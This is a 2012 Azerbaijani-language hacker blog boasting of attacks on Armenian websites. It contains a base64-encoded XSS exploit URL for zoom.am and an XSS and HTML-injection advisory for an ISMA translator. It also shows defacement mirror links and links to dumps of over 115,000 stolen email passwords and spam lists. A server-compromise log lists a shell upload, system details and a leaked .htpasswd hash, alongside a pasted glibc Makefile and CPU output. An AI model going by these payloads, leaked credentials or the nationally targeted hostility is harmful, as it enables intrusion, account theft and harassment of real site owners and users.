26 Ağustos 2012 Pazar
ZOOM GRAPHICS XSS [B64] Vulnerability + Open Redirected
Bu Vulnu baku.am-da tapmışam. Düzdü Çoxu deyirdiki yani çətindir vurmaq sadəcə .php-dən ibarətdi filan. Amma sonra çox kiçik 1 yandanda bəxt demək olar araşdırma nəticəsində Vulnerable olduğun öyrəndim. MetaiZm ilə oturub dərinləşdirdik. Buyurun Vuln :
Kod:
+---------------------------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : ZOOM GRAPHICS XSS [B64] Vulnerability + Open Redirected
# Date : 2012-08-19
# Author : Avatar Fearless
# Official Site : http://zoom.am/
# Version : x.x.x [UnKnown]
# Tested on : Windows 7 Ultimate x32
# Original Advisory : http://thefear.in/zoomam.txt
# Contact : avatar@hiphopfan.com
# Web Sites : http://anti-armenia.org/ || http://millikuvvetler.net/ || http://mexfi.org/
# Greet`Z To : Meta
+---------------------------------------------------------------------------------------------------------------------------------------------------+
[+] Vulnerable :
http://site.tld/l.php?l=2&h=[base64 encode]
[-] Exploit :
Firstable You Will take a XSS Code. Example : '>. We Have to use only quote not Double quote because if we use than script
will parse double quote. And we will encode this code to Base64 . Output : Jz48c2NyaXB0PmFsZXJ0KDEpOzwvc2NyaXB0Pg== So it will be like this :
http://site.tld/zoom/l.php?l=2&h=Jz48c2NyaXB0PmFsZXJ0KDEpOzwvc2NyaXB0Pg==
It is just example
[?] About :
For More Info Contact me.
[@]
Respect To :
All My Bro*S
AA Team
MF Team
MKT Team
+---------------------------------------------------------------------------------------------------------------------------------------------------
Sadəcə Packet Stormy nəsə vulnu qəbul eləmədi sözün düzü dediki "fix your formatting" yani nəsə səhv yazmışam dəyəndəki nəyi? dedilərki aşağıdakılara baxıb harda nəyi səhv yazdığını biləmmərik. Yəqin fərqli adminlərə rastladım zoom.am-da daha çox site var bu vulnla bağlı olan saytlar tapa bilərsiniz =) Uğurlar
Ermənistanın Televiziya kanalı FUCKED!
Xaçik Operation Part 5
Hacked By Avatar & Worm man
http://karmentur.ru
https://www.zone-h.org/mirror/id/18200386
http://golgeler.net/view-%3E39478
http://ethnostars.ru
https://www.zone-h.org/mirror/id/18200378
http://golgeler.net/view-%3E39477
http://tvarm.ru/php2sec/fuck.html
https://www.zone-h.org/mirror/id/18200394
http://golgeler.net/view-%3E39479
http://net.tvarm.ru/
http://arab-zone.net/mirror/179371/net.tvarm.ru
http://golgeler.net/view-%3E39480
http://radio.tvarm.ru/
http://arab-zone.net/mirror/179372/radio.tvarm.ru/
http://golgeler.net/view-%3E39481
http://pay.tvarm.ru/fuck.html
http://golgeler.net/view-%3E39482
http://arab-zone.net/mirror/179395/pay.tvarm.ru/fuck.html
http://pastebin.com/fck4TjDu
Tvarm.ru nu da botik vurdu heç üstündən yarım saat keçməmiş under construction elədilər
+++115450 Mail Fucked!!
115450 Mail : Password
Respect to : Avatar Fearless , Worm Man
and All Bros..
http://tinypaste.com/5a281ce9
P.S : Məncə rekordu təzələdik
930 mail : pass + Mass Mail For Spam
Salamlar. Bu gün Sizlərə tvarm.ru-dan qalmış İP + Mass Mail Spam üçün + Mail və Parolların verəcəm. Arxivdə gördüm dedim paylaşım
İlk Öncə Spam üçün maillər + İP :
(Limit Olduğu üçün Pastebin-ə yazdım) : http://pastebin.com/drR6Lugi
930 mail + pass buyurun :
http://pastebin.com/L2JMpB92
Hamınıza Uğurlar
19 Ağustos 2012 Pazar
Kadr.Ws (ANS TV) Defaced by. SQLulZ CrewZ
Site : http://kadr.ws/
Mirror : https://www.zone-h.org/mirror/id/18238197
HeH Just For Fun!
SQLulZ CrewZ!
Mirror : https://www.zone-h.org/mirror/id/18238197
HeH Just For Fun!
SQLulZ CrewZ!
18 Ağustos 2012 Cumartesi
AFWM Blog v1.5
Salamlar. Mən Avatar Fearless sizə Worm Man ilə yazdığımız
daha doğrusu Editlədiyimiz 1 Blog-u təqdim edirəm. İlk başda Script əla
idi Amma Daha çox funksiya ++ açıqları bağladıq. Bura Aydın Yazıram Blog
Hakkında :
1.) Vulnerabilities (Açıqlar)
- Banners.php (Cross Site Scripting)
Daha Çox Açıq yox idi yada yadıma düşmür.Amma Bağlanıb Əlavə Funksiyalara Gələk :
2.) Extra Functions(Əlavə Funksiyalar) :
- Comment (Şərh) Yazmaq
- Hacking Alətləri (Session-suz)
- Bütün Yorumları Silmək
- Bütün Mövzuları Silmək
Və Digər funksiyalar. 1-2 Rəsim script-dən.
1.) Admin Olduqda Ana Səhifə (Session) :
2.) Menu :
Daha Ətraflı burdan baxın :
http://rcblog.thefear.in/index.php
Scripti burdan yükləyə bilərsiniz :
http://www.share.az/me1q2be9pp18/AFWM_Blog.rar.html
http://www.boxca.com/4s2jsws0h4y7/AFWM_Blog.rar.html
http://hidemyass.com/files/qxKuk/
Nəsə Bug tapıb report eləsəniz Sevinərəm. Scriptin yeni versiyaları ilə qarşınıza yenidən çıxacayıq. Uğurıar
1.) Vulnerabilities (Açıqlar)
- Banners.php (Cross Site Scripting)
Daha Çox Açıq yox idi yada yadıma düşmür.Amma Bağlanıb Əlavə Funksiyalara Gələk :
2.) Extra Functions(Əlavə Funksiyalar) :
- Comment (Şərh) Yazmaq
- Hacking Alətləri (Session-suz)
- Bütün Yorumları Silmək
- Bütün Mövzuları Silmək
Və Digər funksiyalar. 1-2 Rəsim script-dən.
1.) Admin Olduqda Ana Səhifə (Session) :
2.) Menu :
Daha Ətraflı burdan baxın :
http://rcblog.thefear.in/index.php
Scripti burdan yükləyə bilərsiniz :
http://www.share.az/me1q2be9pp18/AFWM_Blog.rar.html
http://www.boxca.com/4s2jsws0h4y7/AFWM_Blog.rar.html
http://hidemyass.com/files/qxKuk/
Nəsə Bug tapıb report eləsəniz Sevinərəm. Scriptin yeni versiyaları ilə qarşınıza yenidən çıxacayıq. Uğurıar
Easy Hacking Methods(PDF)
Salamlar. Bu PDF fayl-da Sizlərə Sadə hacking Yolların
Göstərmişəm. Yazılım başdan ayağa mənə aiddir düz 2 saat vaxtımı apardı
lanet olası şey xD Hər Nəysə Qısaca Yenilər Faydalansın. Gələcək Səfərə
Daha Uğurlu Proyekt-lə qarşınıza çıxaram İNŞALLAH.
Download : http://pdfcast.org/pdf/easy-hacking-method-s-by-avatar-fearless
Online : http://thefear.in/Easy_Hacking_Method.pdf
Download : http://pdfcast.org/pdf/easy-hacking-method-s-by-avatar-fearless
Online : http://thefear.in/Easy_Hacking_Method.pdf
ISMA Online Translator + ISMA Agnet 1.1 XSS + HTML Injection
+------------------------------------------------------------------------------------------------------------+
~~~~ISMA Online Translator + ISMA Agnet 1.1 XSS + HTML Injection~~~~
+------------------------------------------------------------------------------------------------------------+
# Title : ISMA Online Translator XSS + HTML Injection
# Author : AVATAR FEARLESS
# Version : 1.1
# Data : 2012-08-02
# Vulnerability : On The Trasnlating Area
# About : We can input XSS ++ HTML Inject & It Takes Some PHP Scripts.
# Vulnerability Site : http://translator.am/
+--------------------------------------------------+
# Title : ISMA Online Translator Program XSS Vuln
# Author : AVATAR FEARLESS
# Version : 1.2
# Vulnearbility Program : ISMA Agent 1.2
# Vulnearbility Program Download : http://translator.am/setup/ISMAAgent1.2.exe
# About Program : We Can Input XSS.
# Data : 2012-08-02
+--------------------------------------------------+
{Site}
[-] PoC :
http://youtu.be/fQ7dm6vzglE
http://s13.postimage.org/v8g2of4ja/fuckar.jpg
http://s9.postimage.org/xa9ug1zpa/fuckar2.jpg
http://s9.postimage.org/fzo11rxfi/fuckar3.jpg
http://s14.postimage.org/hbey322ow/fuckar4.jpg
[+] Description :
We Can Post HTML Injection ++ XSS & Alsa Some PHP scripts
{Program}
[-] PoC :
1. http://s11.postimage.org/ib6ci67he/adasdasdasda.jpg
2. http://s12.postimage.org/ifsnbmyks/adasdasdasdsadasdasd.jpg
3. http://youtu.be/o3MLRKU3flo
[+] Description :
WE Can Post XSS. + WE Can include Shell via XSS
[@] Conact Me :
Avatar@thefear.in
Avatar@HipHopFan.Com
R3SP3CT T0 :
All My Bro*s
& Anti-armenia Team
Anti-armenia.ORG
Anti-armenia.INFO
Avatar Fearless
+-----------------------------------------------------------------------+
~~~~ISMA Online Translator + ISMA Agnet 1.1 XSS + HTML Injection~~~~
+------------------------------------------------------------------------------------------------------------+
# Title : ISMA Online Translator XSS + HTML Injection
# Author : AVATAR FEARLESS
# Version : 1.1
# Data : 2012-08-02
# Vulnerability : On The Trasnlating Area
# About : We can input XSS ++ HTML Inject & It Takes Some PHP Scripts.
# Vulnerability Site : http://translator.am/
+--------------------------------------------------+
# Title : ISMA Online Translator Program XSS Vuln
# Author : AVATAR FEARLESS
# Version : 1.2
# Vulnearbility Program : ISMA Agent 1.2
# Vulnearbility Program Download : http://translator.am/setup/ISMAAgent1.2.exe
# About Program : We Can Input XSS.
# Data : 2012-08-02
+--------------------------------------------------+
{Site}
[-] PoC :
http://youtu.be/fQ7dm6vzglE
http://s13.postimage.org/v8g2of4ja/fuckar.jpg
http://s9.postimage.org/xa9ug1zpa/fuckar2.jpg
http://s9.postimage.org/fzo11rxfi/fuckar3.jpg
http://s14.postimage.org/hbey322ow/fuckar4.jpg
[+] Description :
We Can Post HTML Injection ++ XSS & Alsa Some PHP scripts
{Program}
[-] PoC :
1. http://s11.postimage.org/ib6ci67he/adasdasdasda.jpg
2. http://s12.postimage.org/ifsnbmyks/adasdasdasdsadasdasd.jpg
3. http://youtu.be/o3MLRKU3flo
[+] Description :
WE Can Post XSS. + WE Can include Shell via XSS
[@] Conact Me :
Avatar@thefear.in
Avatar@HipHopFan.Com
R3SP3CT T0 :
All My Bro*s
& Anti-armenia Team
Anti-armenia.ORG
Anti-armenia.INFO
Avatar Fearless
+-----------------------------------------------------------------------+
radiovan.am + rusradio.am refucked
Hamıya Salamlar. Mən Avatar Fearless çoxdandı bu radiovan.am
üzərində gəzinirdim serverdə 2 ədəd site var idi çox şey edə bilmədim
amma subdomain filan həll elədim "nashoffice.radiovan.am" Subdomain-i
hacked. Hər Şeydən Öncə SP3C!4L Thank`Z To : AkaStep + The*Chaos*M0M!K.
AkaStep Sağolsun username + pass verdi onunla .gif shell upload edərək
bunları əldə etdim. Hər ikisinə Təşəkkürlər + R3SP3CT T0 : All My Bro*S
... Nəysə Başlayaq :
Lap Başda Site + Mirror :
http://nashoffice.radiovan.am/ , http://arab-zone.net/mirror/159861/nashoffice.radiovan.am/
Və
http://rusradio.am/temp/avatar.html , http://zone-h.org/mirror/id/18141504
+ Site RMned!
(P.S : yavaş-yavaş başlamaq istəyirəm
)
Deməli server-də maraqlı 1 şey tapdım :
Aranızda yuxarıdakı Kodun nə olduğunu bilən varsa hakkında məlumat yazsa pis olmaz
(P.S : http://pastebin.com/2VdES4m0 )
Və Siradakı Mərhələ "Site İnformation" :
(P.S : http://pastebin.com/d1B3QYau)
Və Son Olaraqda config + SQL + cat /etc/passwd
(P.S : pastebin.com/4bC7B6wL)
Sp3C!4L FOr M4NY3T!K :
http://hidemyass.com/files/ziEPK/
Burda arm ip-ləri doludu
məndən istəmişti =)))))))
Buda Site-də olan Backup + içində SQL Dump + Şəkil var Shell-dən özünüz daha çox araşdıra bilərsiniz =)
URL : http://www.share.az/rdpsb532ibg3/Backup.rar.html
Və Shell demişkən shell-in çəklin çəkdim =)
Server-də sadəcə iki ədəd site var amma bu siteləri təmizləyəcəm tarixdən
Sayqılarla Avatar Fearless =)
Lap Başda Site + Mirror :
http://nashoffice.radiovan.am/ , http://arab-zone.net/mirror/159861/nashoffice.radiovan.am/
Və
http://rusradio.am/temp/avatar.html , http://zone-h.org/mirror/id/18141504
+ Site RMned!
(P.S : yavaş-yavaş başlamaq istəyirəm
)Deməli server-də maraqlı 1 şey tapdım :
Kod:
# Makefile to (re-)generate db versions of system database files.
# Copyright (C) 1996, 1997, 1998 Free Software Foundation, Inc.
# This file is part of the GNU C Library.
# Contributed by Ulrich Drepper <drepper@cygnus.com>, 1996.
#
# The GNU C Library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Library General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
# The GNU C Library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public
# License along with the GNU C Library; see the file COPYING.LIB. If not,
# write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA. */
DATABASES = $(wildcard /etc/passwd /etc/group /etc/ethers /etc/protocols \
/etc/rpc /etc/services /etc/shadow /etc/netgroup)
VAR_DB = /var/db
AWK = awk
MAKEDB = makedb --quiet
all: $(patsubst %,$(VAR_DB)/%.db,$(notdir $(DATABASES)))
$(VAR_DB)/passwd.db: /etc/passwd
@echo -n "$(patsubst %.db,%,$(@F))... "
@$(AWK) 'BEGIN { FS=":"; OFS=":"; cnt=0 } \
/^[ \t]*$$/ { next } \
/^[ \t]*#/ { next } \
{ printf "0%u ", cnt++; print } \
/^[^#]/ { printf ".%s ", $$1; print; \
printf "=%s ", $$3; print }' $^ | \
$(MAKEDB) -o $@ -
@echo "done."
$(VAR_DB)/group.db: /etc/group
@echo -n "$(patsubst %.db,%,$(@F))... "
@$(AWK) 'BEGIN { FS=":"; OFS=":"; cnt=0 } \
/^[ \t]*$$/ { next } \
/^[ \t]*#/ { next } \
{ printf "0%u ", cnt++; print } \
/^[^#]/ { printf ".%s ", $$1; print; \
printf "=%s ", $$3; print }' $^ | \
$(MAKEDB) -o $@ -
@echo "done."
$(VAR_DB)/ethers.db: /etc/ethers
@echo -n "$(patsubst %.db,%,$(@F))... "
@$(AWK) 'BEGIN { cnt=0 } \
/^[ \t]*$$/ { next } \
/^[ \t]*#/ { next } \
{ printf "0%u ", cnt++; print } \
/^[^#]/ { printf ".%s ", $$1; print; \
printf "=%s ", $$2; print }' $^ | \
$(MAKEDB) -o $@ -
@echo "done."
$(VAR_DB)/protocols.db: /etc/protocols
@echo -n "$(patsubst %.db,%,$(@F))... "
@$(AWK) 'BEGIN { cnt=0 } \
/^[ \t]*$$/ { next } \
/^[ \t]*#/ { next } \
{ printf "0%u ", cnt++; print } \
/^[^#]/ { printf ".%s ", $$1; print; \
printf "=%s ", $$2; print; \
for (i = 3; i <= NF && !($$i ~ /^#/); ++i) \
{ printf ".%s ", $$i; print } }' $^ | \
$(MAKEDB) -o $@ -
@echo "done."
$(VAR_DB)/rpc.db: /etc/rpc
@echo -n "$(patsubst %.db,%,$(@F))... "
@$(AWK) 'BEGIN { cnt=0 } \
/^[ \t]*$$/ { next } \
/^[ \t]*#/ { next } \
{ printf "0%u ", cnt++; print } \
/^[^#]/ { printf ".%s ", $$1; print; \
printf "=%s ", $$2; print; \
for (i = 3; i <= NF && !($$i ~ /^#/); ++i) \
{ printf ".%s ", $$i; print } }' $^ | \
$(MAKEDB) -o $@ -
@echo "done."
$(VAR_DB)/services.db: /etc/services
@echo -n "$(patsubst %.db,%,$(@F))... "
@$(AWK) 'BEGIN { FS="[ \t/]+"; cnt=0 } \
/^[ \t]*$$/ { next } \
/^[ \t]*#/ { next } \
{ printf "0%u ", cnt++; print } \
/^[^#]/ { printf ".%s/%s ", $$1, $$3; print; \
printf ".%s/ ", $$1; print; \
printf "=%s/%s ", $$2, $$3; print; \
printf "=%s/ ", $$2; print; \
for (i = 4; i <= NF && !($$i ~ /^#/); ++i) \
{ printf ".%s/%s ", $$i, $$3; print; \
printf ".%s/ ", $$i; print } }' $^ | \
$(MAKEDB) -o $@ -
@echo "done."
$(VAR_DB)/shadow.db: /etc/shadow
@echo -n "$(patsubst %.db,%,$(@F))... "
@$(AWK) 'BEGIN { FS=":"; OFS=":"; cnt=0 } \
/^[ \t]*$$/ { next } \
/^[ \t]*#/ { next } \
{ printf "0%u ", cnt++; print } \
/^[^#]/ { printf ".%s ", $$1; print }' $^ | \
(umask 077 && $(MAKEDB) -o $@ -)
@echo "done."
@if chgrp shadow $@ 2>/dev/null; then \
chmod g+r $@; \
else \
chown 0 $@; chgrp 0 $@; chmod 600 $@; \
echo; \
echo "Warning: The shadow password database $@"; \
echo "has been set to be readable only by root. You may want"; \
echo "to make it readable by the \`shadow' group depending"; \
echo "on your configuration."; \
echo; \
fi
$(VAR_DB)/netgroup.db: /etc/netgroup
@echo -n "$(patsubst %.db,%,$(@F))... "
@$(AWK) 'BEGIN { cnt=0 } \
/^[ \t]*$$/ { next } \
/^[ \t]*#/ { next } \
{ printf "0%u ", cnt++; print } \
/^[^#]/ { end=sub(/\\/, " "); \
gsub(/[ \t]+/, " "); \
if(end == 1) printf "%s", $$0; else print }' $^ | \
$(MAKEDB) -o $@ -
@echo "done."
# Copyright (C) 1996, 1997, 1998 Free Software Foundation, Inc.
# This file is part of the GNU C Library.
# Contributed by Ulrich Drepper <drepper@cygnus.com>, 1996.
#
# The GNU C Library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Library General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
# The GNU C Library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public
# License along with the GNU C Library; see the file COPYING.LIB. If not,
# write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA. */
DATABASES = $(wildcard /etc/passwd /etc/group /etc/ethers /etc/protocols \
/etc/rpc /etc/services /etc/shadow /etc/netgroup)
VAR_DB = /var/db
AWK = awk
MAKEDB = makedb --quiet
all: $(patsubst %,$(VAR_DB)/%.db,$(notdir $(DATABASES)))
$(VAR_DB)/passwd.db: /etc/passwd
@echo -n "$(patsubst %.db,%,$(@F))... "
@$(AWK) 'BEGIN { FS=":"; OFS=":"; cnt=0 } \
/^[ \t]*$$/ { next } \
/^[ \t]*#/ { next } \
{ printf "0%u ", cnt++; print } \
/^[^#]/ { printf ".%s ", $$1; print; \
printf "=%s ", $$3; print }' $^ | \
$(MAKEDB) -o $@ -
@echo "done."
$(VAR_DB)/group.db: /etc/group
@echo -n "$(patsubst %.db,%,$(@F))... "
@$(AWK) 'BEGIN { FS=":"; OFS=":"; cnt=0 } \
/^[ \t]*$$/ { next } \
/^[ \t]*#/ { next } \
{ printf "0%u ", cnt++; print } \
/^[^#]/ { printf ".%s ", $$1; print; \
printf "=%s ", $$3; print }' $^ | \
$(MAKEDB) -o $@ -
@echo "done."
$(VAR_DB)/ethers.db: /etc/ethers
@echo -n "$(patsubst %.db,%,$(@F))... "
@$(AWK) 'BEGIN { cnt=0 } \
/^[ \t]*$$/ { next } \
/^[ \t]*#/ { next } \
{ printf "0%u ", cnt++; print } \
/^[^#]/ { printf ".%s ", $$1; print; \
printf "=%s ", $$2; print }' $^ | \
$(MAKEDB) -o $@ -
@echo "done."
$(VAR_DB)/protocols.db: /etc/protocols
@echo -n "$(patsubst %.db,%,$(@F))... "
@$(AWK) 'BEGIN { cnt=0 } \
/^[ \t]*$$/ { next } \
/^[ \t]*#/ { next } \
{ printf "0%u ", cnt++; print } \
/^[^#]/ { printf ".%s ", $$1; print; \
printf "=%s ", $$2; print; \
for (i = 3; i <= NF && !($$i ~ /^#/); ++i) \
{ printf ".%s ", $$i; print } }' $^ | \
$(MAKEDB) -o $@ -
@echo "done."
$(VAR_DB)/rpc.db: /etc/rpc
@echo -n "$(patsubst %.db,%,$(@F))... "
@$(AWK) 'BEGIN { cnt=0 } \
/^[ \t]*$$/ { next } \
/^[ \t]*#/ { next } \
{ printf "0%u ", cnt++; print } \
/^[^#]/ { printf ".%s ", $$1; print; \
printf "=%s ", $$2; print; \
for (i = 3; i <= NF && !($$i ~ /^#/); ++i) \
{ printf ".%s ", $$i; print } }' $^ | \
$(MAKEDB) -o $@ -
@echo "done."
$(VAR_DB)/services.db: /etc/services
@echo -n "$(patsubst %.db,%,$(@F))... "
@$(AWK) 'BEGIN { FS="[ \t/]+"; cnt=0 } \
/^[ \t]*$$/ { next } \
/^[ \t]*#/ { next } \
{ printf "0%u ", cnt++; print } \
/^[^#]/ { printf ".%s/%s ", $$1, $$3; print; \
printf ".%s/ ", $$1; print; \
printf "=%s/%s ", $$2, $$3; print; \
printf "=%s/ ", $$2; print; \
for (i = 4; i <= NF && !($$i ~ /^#/); ++i) \
{ printf ".%s/%s ", $$i, $$3; print; \
printf ".%s/ ", $$i; print } }' $^ | \
$(MAKEDB) -o $@ -
@echo "done."
$(VAR_DB)/shadow.db: /etc/shadow
@echo -n "$(patsubst %.db,%,$(@F))... "
@$(AWK) 'BEGIN { FS=":"; OFS=":"; cnt=0 } \
/^[ \t]*$$/ { next } \
/^[ \t]*#/ { next } \
{ printf "0%u ", cnt++; print } \
/^[^#]/ { printf ".%s ", $$1; print }' $^ | \
(umask 077 && $(MAKEDB) -o $@ -)
@echo "done."
@if chgrp shadow $@ 2>/dev/null; then \
chmod g+r $@; \
else \
chown 0 $@; chgrp 0 $@; chmod 600 $@; \
echo; \
echo "Warning: The shadow password database $@"; \
echo "has been set to be readable only by root. You may want"; \
echo "to make it readable by the \`shadow' group depending"; \
echo "on your configuration."; \
echo; \
fi
$(VAR_DB)/netgroup.db: /etc/netgroup
@echo -n "$(patsubst %.db,%,$(@F))... "
@$(AWK) 'BEGIN { cnt=0 } \
/^[ \t]*$$/ { next } \
/^[ \t]*#/ { next } \
{ printf "0%u ", cnt++; print } \
/^[^#]/ { end=sub(/\\/, " "); \
gsub(/[ \t]+/, " "); \
if(end == 1) printf "%s", $$0; else print }' $^ | \
$(MAKEDB) -o $@ -
@echo "done."
Aranızda yuxarıdakı Kodun nə olduğunu bilən varsa hakkında məlumat yazsa pis olmaz
(P.S : http://pastebin.com/2VdES4m0 )
Və Siradakı Mərhələ "Site İnformation" :
Kod:
http://rusradio.am/temp/avatar.html
, http://zone-h.org/mirror/id/18141504 ,
http://hidemyass.com/files/ziEPK/ , http://pastebin.com/2VdES4m0
+---------------------------------------------------------------------------------------+
|Software: Apache/2.2.14 (Fedora). PHP/5.2.9 |
| |
|uname -a: Linux media.radiovan.am 2.6.30.5 #1 SMP Fri Aug 21 04:59:24 AMST 2009 i686 |
| |
|uid=48(apache) gid=48(apache) groups=48(apache),489(backuppc) |
|context=unconfined_u:system_r:httpd_t:s0 |
| |
|Safe-mode: OFF (not secure) |
+---------------------------------------------------------------------------------------+
http://nashoffice.radiovan.am/ , http://arab-zone.net/mirror/159861/nashoffice.radiovan.am/
.htpasswd :
top:aaVXR1JupgoFo
More Info :
OS Version? - Linux version 2.6.30.5 (root@media.radiovan.am) (gcc version 4.3.2 20081105 (Red Hat 4.3.2-7) (GCC) ) #1 SMP Fri Aug 21 04:59:24 AMST 2009
Kernel version? - kernel.version = #1 SMP Fri Aug 21 04:59:24 AMST 2009
net.ipv4.conf.all.force_igmp_version = 0
net.ipv4.conf.default.force_igmp_version = 0
net.ipv4.conf.lo.force_igmp_version = 0
net.ipv4.conf.eth0.force_igmp_version = 0
net.ipv4.conf.eth1.force_igmp_version = 0
net.ipv4.conf.pan0.force_igmp_version = 0
net.ipv6.conf.all.force_mld_version = 0
net.ipv6.conf.default.force_mld_version = 0
net.ipv6.conf.lo.force_mld_version = 0
net.ipv6.conf.eth0.force_mld_version = 0
net.ipv6.conf.eth1.force_mld_version = 0
net.ipv6.conf.pan0.force_mld_version = 0
Distrib name - Fedora release 10 (Cambridge)
Kernel \r on an \m (\l)
CPU? - processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Xeon(R) CPU E5420 @ 2.50GHz
stepping : 10
cpu MHz : 2000.000
cache size : 6144 KB
physical id : 0
siblings : 4
core id : 0
cpu cores : 4
apicid : 0
initial apicid : 0
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 xsave lahf_lm tpr_shadow vnmi flexpriority
bogomips : 4999.44
clflush size : 64
power management:
processor : 1
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Xeon(R) CPU E5420 @ 2.50GHz
stepping : 10
cpu MHz : 2500.000
cache size : 6144 KB
physical id : 1
siblings : 4
core id : 0
cpu cores : 4
apicid : 4
initial apicid : 4
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 xsave lahf_lm tpr_shadow vnmi flexpriority
bogomips : 4999.29
clflush size : 64
power management:
processor : 2
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Xeon(R) CPU E5420 @ 2.50GHz
stepping : 10
cpu MHz : 2000.000
cache size : 6144 KB
physical id : 0
siblings : 4
core id : 1
cpu cores : 4
apicid : 1
initial apicid : 1
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 xsave lahf_lm tpr_shadow vnmi flexpriority
bogomips : 4999.28
clflush size : 64
power management:
processor : 3
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Xeon(R) CPU E5420 @ 2.50GHz
stepping : 10
cpu MHz : 2500.000
cache size : 6144 KB
physical id : 1
siblings : 4
core id : 1
cpu cores : 4
apicid : 5
initial apicid : 5
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 xsave lahf_lm tpr_shadow vnmi flexpriority
bogomips : 5054.94
clflush size : 64
power management:
processor : 4
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Xeon(R) CPU E5420 @ 2.50GHz
stepping : 10
cpu MHz : 2000.000
cache size : 6144 KB
physical id : 0
siblings : 4
core id : 2
cpu cores : 4
apicid : 2
initial apicid : 2
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 xsave lahf_lm tpr_shadow vnmi flexpriority
bogomips : 4999.26
clflush size : 64
power management:
processor : 5
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Xeon(R) CPU E5420 @ 2.50GHz
stepping : 10
cpu MHz : 2000.000
cache size : 6144 KB
physical id : 1
siblings : 4
core id : 2
cpu cores : 4
apicid : 6
initial apicid : 6
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 xsave lahf_lm tpr_shadow vnmi flexpriority
bogomips : 4999.28
clflush size : 64
power management:
processor : 6
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Xeon(R) CPU E5420 @ 2.50GHz
stepping : 10
cpu MHz : 2000.000
cache size : 6144 KB
physical id : 0
siblings : 4
core id : 3
cpu cores : 4
apicid : 3
initial apicid : 3
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc arch_perfmon pebs bts pni dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm dca sse4_1 xsave lahf_lm tpr_shadow vnmi flexpriority
bogomips : 4999.26
clflush size : 64
power management:
processor : 7
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Xeon(R) CPU E5420 @ 2.50GHz
stepping : 10
cpu MHz : 2000.000
cache size : 6144 KB
physical id : 1
siblings : 4
core id : 3
cpu cores : 4
apicid : 7
initial apicid : 7
fdiv_bug : no
hlt_bug : no
f00f_bug : no
coma_bug : no
fpu : yes
fpu_exception : yes
cpuid level : 13
wp : yes
